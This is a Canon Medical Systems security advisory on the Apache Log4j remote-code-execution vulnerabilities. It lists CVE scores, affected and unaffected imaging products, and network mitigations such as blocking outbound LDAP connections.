Search

Apache Log4j Vulnerability

Canon Medical Systems Security Advisory

Overview:
It was announced that there are security vulnerabilities in Apache Log4j, a Java-based logging library provided by The Apache Software Foundation. On a server running Apache Log4j, a remote attacker could execute arbitrary code by sending specially crafted data that exploits these vulnerabilities.

Vulnerability Overview:
Log4j has a Lookup function that evaluates some values as variables from the character string described in the log. Among the Lookup functions, by exploiting the JNDI Lookup function, the problem (CWE-20, CVE-2021-44228) was discovered that Java class information is deserialized and executed from the external URL or internal path included in the log. This could allow a remote attacker to log a specially crafted string into the vulnerable system's log, resulting in arbitrary Java code being executed by the system. CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832 were also reported after CVE-2021-44228. All vulnerabilities were fixed in the latest Log4j version (2.17.1).
The Apache Software Foundation has published the following information:

REF: https://www.oracle.com/security-alerts/alert-cve-2021-44228.html
REF: https://nvd.nist.gov/vuln/detail/CVE-2021-44228

-Base CVSS Score :
CVE-2021-44228　10.0 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE-2021-45046　9.0 (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)
CVE-2021-45105　5.9 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)
CVE-2021-44832　6.6 (AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)
-Versions Affected: all versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.17.1

Possible Affected Canon Medical Systems Products:
The following Canon Medical Systems Corporation products are not using Apache Log4j.

CT Medical Imaging Products
MR Medical Imaging Products
UL Medical Imaging Products
XR Medical Imaging Products
NM Medical Imaging Products
Eye-Care Products
Canon DR Products (CXDI_NE) such as Omnera, FlexPro, Soltus
VL Infinix-i and Alphenix DFP
VL Infinix-i Angio Workstation (AWS)

Canon Medical Products that are affected

Vitrea Advanced 7.x
VL Alphenix Angio Workstation (AWS)

Mitigations for affected systems:

For VL Alphenix Angio Workstation (AWS), it is confirmed that LDAP port 389 is closed on all AWS versions from 8.0 to 9.3. Since the LDAP communication is closed, Step 1, shown below, of the attack fails therefore there is no impact for the Alphenix Angio Workstation (AWS).

Source: JPCERT Coordination Center
"Observation of Attacks Targeting Apache Log4j2 RCE Vulnerability (CVE-2021-44228)"
https://blogs.jpcert.or.jp/en/2021/12/log4j-cve-2021-44228.html

In order to mitigate the effects of attacks that exploit this vulnerability, please consider reviewing and minimizing the threat vector to limit connections from the system to the network.
Update firewall configurations to block outbound connections on the LDAP port.　Please contact your IT Department to update your firewall configurations. As an example, please see the following industry-recommended mitigation:　
https://blogs.cisco.com/security/protecting-against-log4j-with-secure-firewall-secure-ips
For Vitrea Advanced 7.x, please see the following mitigation instructions.
https://www.vitalimages.com/customer-success-support-program/vital-images-software-security-updates/

Due to medical device regulatory reasons, not all products/service displayed on this webpage are available in all countries, regions or markets. Future availability of the products/service cannot also be guaranteed. Please contact your local Canon Medical Group representative for further details.

Development and manufacturing functions of Canon Medical Systems Corporation have been transferred to CANON INC. In this website, any reference to “Canon Medical Systems Corporation” refers to “CANON INC.”